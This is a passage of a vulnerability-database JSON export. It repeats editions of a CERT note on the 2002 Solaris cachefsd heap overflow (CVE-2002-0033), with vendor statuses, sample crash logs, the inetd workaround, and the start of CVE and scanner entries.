comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ __ IBM\n\nNotified: May 06, 2002 Updated: May 06, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nIBM's AIX operating system, all versions, is not vulnerable.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ __ Nortel Networks\n\nUpdated: May 13, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nNortel Networks products and solutions using the affected Sun Solaris operating systems do not utilize the NFS/RPC file system cachefs daemon. Nortel Networks recommends following the mitigating practices in Sun Microsystems Inc.'s Alert Notification.; this will not impact these Nortel Networks products and solutions. \n \nFor more information please contact Nortel at: \n \nNorth America: 1-8004NORTEL or 1-800-466-7835 \nEurope, Middle East and Africa: 00800 8008 9009, or +44 (0) 870 907 9009 \n \nContacts for other regions are available at \n\n\n[www.nortelnetworks.com/help/contact/global/](<www.nortelnetworks.com/help/contact/global/>)\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ OpenBSD\n\nNotified: May 06, 2002 Updated: May 06, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ __ SGI\n\nNotified: May 06, 2002 Updated: May 06, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nSGI does not ship with SUN cachefsd, so IRIX is not vulnerable.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F44309>\n * <http://archives.neohapsis.com/archives/bugtraq/2002-05/0026.html>\n\n### Credit\n\nThe CERT/CC acknowledges the Last Stage of Delirium Team for discovering and reporting on this vulnerability and thanks Sun Microsystems for their technical assistance. \n\nThis document was written by Jason Rafail and Jeffrey Havrilla. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2002-0033](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0033>) \n---|--- \n**CERT Advisory:** | [CA-2002-11 ](<http://www.cert.org/advisories/CA-2002-11.html>) \n**Severity Metric:****** | 52.92 \n**Date Public:** | 2002-05-05 \n**Date First Published:** | 2002-05-06 \n**Date Last Updated: ** | 2002-05-14 13:58 UTC \n**Document Revision: ** | 31 \n", "published": "2002-05-06T00:00:00", "modified": "2002-05-14T13:58:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.kb.cert.org/vuls/id/635811", "reporter": "CERT", "references": ["http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F44309", "http://archives.neohapsis.com/archives/bugtraq/2002-05/0026.html"], "cvelist": ["CVE-2002-0033"], "lastseen": "2019-04-24T19:53:03", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2002-0033"]}, {"type": "saint", "idList": ["SAINT:B3F3037AA3E9EA0D7F6A527A77125B8F", "SAINT:3AEC527DDF0F8FD500158F5102FDDEE0", "SAINT:8FE2C21CB99188D66319904930E9E2EF"]}, {"type": "osvdb", "idList": ["OSVDB:779"]}, {"type": "exploitdb", "idList": ["EDB-ID:21437"]}, {"type": "nessus", "idList": ["CACHEFSD_OVERFLOW.NASL"]}, {"type": "cisco", "idList": ["CISCO-SA-20020724-SOLARIS-CACHEFS"]}], "modified": "2019-04-24T19:53:03"}}, "objectVersion": "1.4"}, "lastseen": "2019-04-24T19:53:03", "differentElements": ["description"], "edition": 6}, {"bulletin": {"id": "VU:635811", "hash": "3da1de4eaf3b065a9d2cc0a4158f3da5", "type": "cert", "bulletinFamily": "info", "title": "Sun Solaris cachefsd vulnerable to heap overflow in cfsd_calloc() function via long string of characters", "description": "### Overview \n\nSun's NFS/RPC cachefs daemon (cachefsd) is shipped and installed by default with Sun Solaris 2.5.1, 2.6, 7, and 8 (SPARC and Intel architectures). Cachefsd caches requests for operations on remote file systems mounted via the use of NFS protocol. A remotely exploitable heap overflow exists in cachefsd that could permit a remote attacker to execute arbitrary code with the privileges of the cachefsd, typically root.\n\n### Description \n\nA remotely exploitable heap overflow exists in the cachefsd program shipped and installed by default with Sun Solaris 2.5.1, 2.6, 7, and 8 (SPARC and Intel architectures). A remote attacker can send a crafted RPC request to the cachefsd program to remotely exploit the vulnerability.\n\nLogs of exploitation attempts may resemble the following: \n \n`May 16 22:46:08 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped \nMay 16 22:46:21 victim-host last message repeated 7 times \nMay 16 22:46:22 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Bus Error - core dumped \nMay 16 22:46:24 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped \nMay 16 22:46:56 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Bus Error - core dumped \nMay 16 22:46:59 victim-host last message repeated 1 time \nMay 16 22:47:02 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped \nMay 16 22:47:07 victim-host last message repeated 3 times \nMay 16 22:47:09 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Hangup \nMay 16 22:47:11 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped` \n \n \nSun Microsystems has released a [Sun Alert Notification](<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309>) which addresses this issue as well as the issue described in [VU#161931](<http://www.kb.cert.org/vuls/id/161931>). \n \nAccording to the [Sun Alert Notification](<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309>), failed attempts to exploit this vulnerability will leave core dumps in the root directory. The presence of the core file does not preclude the success of subsequent attacks. Additionally, if the file /etc/cachefstab exists, it may contain unusual entries. \n \nThis issue is also being referenced as [CAN-2002-0033](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0033>): \n\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0033> \n--- \n \n### Impact \n\nA remote attacker can execute code with the privileges of the cachefsd process, typically root. \n \n--- \n \n### Solution \n\nThe CERT/CC is currently unaware of patches for this problem. \n \n--- \n \nAccording to a [Sun Alert Notification](<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309>) a workaround is as follows:\n\n \n_Comment out cachefsd in /etc/inetd.conf as shown below: _ \n \n_ #100235/1 tli rpc/tcp wait root /usr/lib/fs/cachefs/cachefsd cachefsd _ \n \n_ Once the line is commented out either: _ \n \n_ \\- reboot, or_ \n_ \\- send a HUP signal to inetd(1M) and kill existing cachefsd processes, for example,_ \n_ on Solaris 2.5.1 and 2.6 do the following:_ \n_ $ kill -HUP <PID of inetd>_ \n_ $ kill <PIDs of any cachefsd processes>_ \n \n_ Solaris 7 and 8 do the following:_ \n_ $ pkill -HUP inetd_ \n_ $ pkill cachefsd _ \n \n_ The possible side effects of the workaround are: _ \n \n_ \\- for systems not using cachefs:_ \n \n_ There is no impact._ \n \n_ \\- for systems using cachefs:_ \n \n_ Only a \"disconnected\" operation is known to be affected by _ \n_ disabling cachefsd. This feature is rarely used outside of AutoClient._ \n \n_ Mounts and unmounts should still succeed though an error message _ \n_ may be seen, \"mount -F cachefs: cachefsd is not running\"._ \n \n_ There is no performance impact._ \n \n_ \\- for systems using AutoClient:_ \n \n_ The impact is unknown. Again, only \"disconnected\" mode is likely _ \n_ to be affected. _ \n \n--- \n \n### Vendor Information\n\n635811\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ __ Sun\n\nNotified: May 06, 2002 Updated: May 06, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nSee, <http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F44309>.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ __ Cray\n\nUpdated: May 13, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nCray, Inc. is not vulnerable since cachefs is not supported under Unicos and Unicos/mk.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ __ Fujitsu\n\nUpdated: May 14, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nUXP/V is not vulnerable, because it does not have Cachefs and similar functionalities.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ __ Hewlett Packard\n\nNotified: May 06, 2002 Updated: May 07, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nHP-UX is not vulnerable because it does not use cachefsd.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ __ IBM\n\nNotified: May 06, 2002 Updated: May 06, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nIBM's AIX operating system, all versions, is not vulnerable.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ __ Nortel Networks\n\nUpdated: May 13, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nNortel Networks products and solutions using the affected Sun Solaris operating systems do not utilize the NFS/RPC file system cachefs daemon. Nortel Networks recommends following the mitigating practices in Sun Microsystems Inc.'s Alert Notification.; this will not impact these Nortel Networks products and solutions. \n \nFor more information please contact Nortel at: \n \nNorth America: 1-8004NORTEL or 1-800-466-7835 \nEurope, Middle East and Africa: 00800 8008 9009, or +44 (0) 870 907 9009 \n \nContacts for other regions are available at \n\n\n[www.nortelnetworks.com/help/contact/global/](<www.nortelnetworks.com/help/contact/global/>)\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ OpenBSD\n\nNotified: May 06, 2002 Updated: May 06, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ __ SGI\n\nNotified: May 06, 2002 Updated: May 06, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nSGI does not ship with SUN cachefsd, so IRIX is not vulnerable.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F44309>\n * <http://archives.neohapsis.com/archives/bugtraq/2002-05/0026.html>\n\n### Acknowledgements\n\nThe CERT/CC acknowledges the Last Stage of Delirium Team for discovering and reporting on this vulnerability and thanks Sun Microsystems for their technical assistance. \n\nThis document was written by Jason Rafail and Jeffrey Havrilla. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2002-0033](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0033>) \n---|--- \n**CERT Advisory:** | [CA-2002-11 ](<http://www.cert.org/advisories/CA-2002-11.html>) \n**Severity Metric:****** | 52.92 \n**Date Public:** | 2002-05-05 \n**Date First Published:** | 2002-05-06 \n**Date Last Updated: ** | 2002-05-14 13:58 UTC \n**Document Revision: ** | 31 \n", "published": "2002-05-06T00:00:00", "modified": "2002-05-14T13:58:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.kb.cert.org/vuls/id/635811", "reporter": "CERT", "references": ["http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F44309", "http://archives.neohapsis.com/archives/bugtraq/2002-05/0026.html"], "cvelist": ["CVE-2002-0033"], "lastseen": "2019-05-01T19:53:03", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2002-0033"]}, {"type": "saint", "idList": ["SAINT:B3F3037AA3E9EA0D7F6A527A77125B8F", "SAINT:3AEC527DDF0F8FD500158F5102FDDEE0", "SAINT:8FE2C21CB99188D66319904930E9E2EF"]}, {"type": "osvdb", "idList": ["OSVDB:779"]}, {"type": "exploitdb", "idList": ["EDB-ID:21437"]}, {"type": "nessus", "idList": ["CACHEFSD_OVERFLOW.NASL"]}, {"type": "cisco", "idList": ["CISCO-SA-20020724-SOLARIS-CACHEFS"]}], "modified": "2019-05-01T19:53:03"}}, "objectVersion": "1.4"}, "lastseen": "2019-05-01T19:53:03", "differentElements": ["cvss"], "edition": 7}, {"bulletin": {"id": "VU:635811", "hash": "495baa44b1b22e09ba01dbbc8a8e2db8", "type": "cert", "bulletinFamily": "info", "title": "Sun Solaris cachefsd vulnerable to heap overflow in cfsd_calloc() function via long string of characters", "description": "### Overview \n\nSun's NFS/RPC cachefs daemon (cachefsd) is shipped and installed by default with Sun Solaris 2.5.1, 2.6, 7, and 8 (SPARC and Intel architectures). Cachefsd caches requests for operations on remote file systems mounted via the use of NFS protocol. A remotely exploitable heap overflow exists in cachefsd that could permit a remote attacker to execute arbitrary code with the privileges of the cachefsd, typically root.\n\n### Description \n\nA remotely exploitable heap overflow exists in the cachefsd program shipped and installed by default with Sun Solaris 2.5.1, 2.6, 7, and 8 (SPARC and Intel architectures). A remote attacker can send a crafted RPC request to the cachefsd program to remotely exploit the vulnerability.\n\nLogs of exploitation attempts may resemble the following: \n \n`May 16 22:46:08 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped \nMay 16 22:46:21 victim-host last message repeated 7 times \nMay 16 22:46:22 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Bus Error - core dumped \nMay 16 22:46:24 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped \nMay 16 22:46:56 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Bus Error - core dumped \nMay 16 22:46:59 victim-host last message repeated 1 time \nMay 16 22:47:02 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped \nMay 16 22:47:07 victim-host last message repeated 3 times \nMay 16 22:47:09 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Hangup \nMay 16 22:47:11 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped` \n \n \nSun Microsystems has released a [Sun Alert Notification](<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309>) which addresses this issue as well as the issue described in [VU#161931](<http://www.kb.cert.org/vuls/id/161931>). \n \nAccording to the [Sun Alert Notification](<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309>), failed attempts to exploit this vulnerability will leave core dumps in the root directory. The presence of the core file does not preclude the success of subsequent attacks. Additionally, if the file /etc/cachefstab exists, it may contain unusual entries. \n \nThis issue is also being referenced as [CAN-2002-0033](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0033>): \n\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0033> \n--- \n \n### Impact \n\nA remote attacker can execute code with the privileges of the cachefsd process, typically root. \n \n--- \n \n### Solution \n\nThe CERT/CC is currently unaware of patches for this problem. \n \n--- \n \nAccording to a [Sun Alert Notification](<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309>) a workaround is as follows:\n\n \n_Comment out cachefsd in /etc/inetd.conf as shown below: _ \n \n_ #100235/1 tli rpc/tcp wait root /usr/lib/fs/cachefs/cachefsd cachefsd _ \n \n_ Once the line is commented out either: _ \n \n_ \\- reboot, or_ \n_ \\- send a HUP signal to inetd(1M) and kill existing cachefsd processes, for example,_ \n_ on Solaris 2.5.1 and 2.6 do the following:_ \n_ $ kill -HUP <PID of inetd>_ \n_ $ kill <PIDs of any cachefsd processes>_ \n \n_ Solaris 7 and 8 do the following:_ \n_ $ pkill -HUP inetd_ \n_ $ pkill cachefsd _ \n \n_ The possible side effects of the workaround are: _ \n \n_ \\- for systems not using cachefs:_ \n \n_ There is no impact._ \n \n_ \\- for systems using cachefs:_ \n \n_ Only a \"disconnected\" operation is known to be affected by _ \n_ disabling cachefsd. This feature is rarely used outside of AutoClient._ \n \n_ Mounts and unmounts should still succeed though an error message _ \n_ may be seen, \"mount -F cachefs: cachefsd is not running\"._ \n \n_ There is no performance impact._ \n \n_ \\- for systems using AutoClient:_ \n \n_ The impact is unknown. Again, only \"disconnected\" mode is likely _ \n_ to be affected. _ \n \n--- \n \n### Vendor Information\n\n635811\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ __ Sun\n\nNotified: May 06, 2002 Updated: May 06, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nSee, <http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F44309>.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ __ Cray\n\nUpdated: May 13, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nCray, Inc. is not vulnerable since cachefs is not supported under Unicos and Unicos/mk.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ __ Fujitsu\n\nUpdated: May 14, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nUXP/V is not vulnerable, because it does not have Cachefs and similar functionalities.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ __ Hewlett Packard\n\nNotified: May 06, 2002 Updated: May 07, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nHP-UX is not vulnerable because it does not use cachefsd.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ __ IBM\n\nNotified: May 06, 2002 Updated: May 06, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nIBM's AIX operating system, all versions, is not vulnerable.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ __ Nortel Networks\n\nUpdated: May 13, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nNortel Networks products and solutions using the affected Sun Solaris operating systems do not utilize the NFS/RPC file system cachefs daemon. Nortel Networks recommends following the mitigating practices in Sun Microsystems Inc.'s Alert Notification.; this will not impact these Nortel Networks products and solutions. \n \nFor more information please contact Nortel at: \n \nNorth America: 1-8004NORTEL or 1-800-466-7835 \nEurope, Middle East and Africa: 00800 8008 9009, or +44 (0) 870 907 9009 \n \nContacts for other regions are available at \n\n\n[www.nortelnetworks.com/help/contact/global/](<www.nortelnetworks.com/help/contact/global/>)\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ OpenBSD\n\nNotified: May 06, 2002 Updated: May 06, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ __ SGI\n\nNotified: May 06, 2002 Updated: May 06, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nSGI does not ship with SUN cachefsd, so IRIX is not vulnerable.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F44309>\n * <http://archives.neohapsis.com/archives/bugtraq/2002-05/0026.html>\n\n### Acknowledgements\n\nThe CERT/CC acknowledges the Last Stage of Delirium Team for discovering and reporting on this vulnerability and thanks Sun Microsystems for their technical assistance. \n\nThis document was written by Jason Rafail and Jeffrey Havrilla. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2002-0033](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0033>) \n---|--- \n**CERT Advisory:** | [CA-2002-11 ](<http://www.cert.org/advisories/CA-2002-11.html>) \n**Severity Metric:****** | 52.92 \n**Date Public:** | 2002-05-05 \n**Date First Published:** | 2002-05-06 \n**Date Last Updated: ** | 2002-05-14 13:58 UTC \n**Document Revision: ** | 31 \n", "published": "2002-05-06T00:00:00", "modified": "2002-05-14T13:58:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.kb.cert.org/vuls/id/635811", "reporter": "CERT", "references": ["http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F44309", "http://archives.neohapsis.com/archives/bugtraq/2002-05/0026.html"], "cvelist": ["CVE-2002-0033"], "lastseen": "2019-05-29T20:45:01", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 8.1, "vector": "NONE", "modified": "2019-05-29T20:45:01"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2002-0033"]}, {"type": "saint", "idList": ["SAINT:3AEC527DDF0F8FD500158F5102FDDEE0", "SAINT:B3F3037AA3E9EA0D7F6A527A77125B8F", "SAINT:8FE2C21CB99188D66319904930E9E2EF"]}, {"type": "osvdb", "idList": ["OSVDB:779"]}, {"type": "exploitdb", "idList": ["EDB-ID:21437"]}, {"type": "nessus", "idList": ["CACHEFSD_OVERFLOW.NASL"]}, {"type": "cisco", "idList": ["CISCO-SA-20020724-SOLARIS-CACHEFS"]}], "modified": "2019-05-29T20:45:01"}}, "objectVersion": "1.4"}, "lastseen": "2019-05-29T20:45:01", "differentElements": ["description"], "edition": 8}], "viewCount": 8, "enchantments": {"score": {"value": 8.1, "vector": "NONE", "modified": "2019-10-09T19:53:48"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2002-0033"]}, {"type": "saint", "idList": ["SAINT:B3F3037AA3E9EA0D7F6A527A77125B8F", "SAINT:3AEC527DDF0F8FD500158F5102FDDEE0", "SAINT:8FE2C21CB99188D66319904930E9E2EF"]}, {"type": "osvdb", "idList": ["OSVDB:779"]}, {"type": "exploitdb", "idList": ["EDB-ID:21437"]}, {"type": "nessus", "idList": ["CACHEFSD_OVERFLOW.NASL"]}, {"type": "cisco", "idList": ["CISCO-SA-20020724-SOLARIS-CACHEFS"]}], "modified": "2019-10-09T19:53:48"}, "vulnersScore": 8.1}, "objectVersion": "1.4", "_object_type": "robots.models.cert.CertBulletin", "_object_types": ["robots.models.cert.CertBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:07:38", "bulletinFamily": "NVD", "description": "Heap-based buffer overflow in cfsd_calloc function of Solaris cachefsd allows remote attackers to execute arbitrary code via a request with a long directory and cache name.", "modified": "2018-10-30T16:25:00", "id": "CVE-2002-0033", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0033", "published": "2002-05-29T04:00:00", "title": "CVE-2002-0033", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2019-05-29T17:19:53", "bulletinFamily": "exploit", "description": "Added: 04/05/2006 \nCVE: [CVE-2002-0033](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0033>) \nBID: [4674](<http://www.securityfocus.com/bid/4674>) \nOSVDB: [779](<http://www.osvdb.org/779>) \n\n\n### Background\n\n`**cachefsd**` is an RPC service which supports local caching of Network File Systems (NFS), thereby improving performance on filesystems mounted from an NFS server. \n\n### Problem\n\nA heap overflow in `**cachefsd**` allows remote command execution. \n\n### Resolution\n\nApply the patch or workaround referenced in [Sun Alert 44309](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-44309-1>). \n\n### References\n\n<http://www.cert.org/advisories/CA-2002-11.html> \n\n\n### Platforms\n\nSunOS 5.6 / Solaris 2.6 \nSunOS 5.7 / Solaris 7 \n \n\n", "modified": "2006-04-05T00:00:00", "published": "2006-04-05T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/solaris_cachefsd", "id": "SAINT:B3F3037AA3E9EA0D7F6A527A77125B8F", "type": "saint", "title": "cachefsd heap overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:59", "bulletinFamily": "exploit", "description": "Added: 04/05/2006 \nCVE: [CVE-2002-0033](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0033>) \nBID: [4674](<http://www.securityfocus.com/bid/4674>) \nOSVDB: [779](<http://www.osvdb.org/779>) \n\n\n### Background\n\n`**cachefsd**` is an RPC service which supports local caching of Network File Systems (NFS), thereby improving performance on filesystems mounted from an NFS server. \n\n### Problem\n\nA heap overflow in `**cachefsd**` allows remote command execution. \n\n### Resolution\n\nApply the patch or workaround referenced in [Sun Alert 44309](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-44309-1>). \n\n### 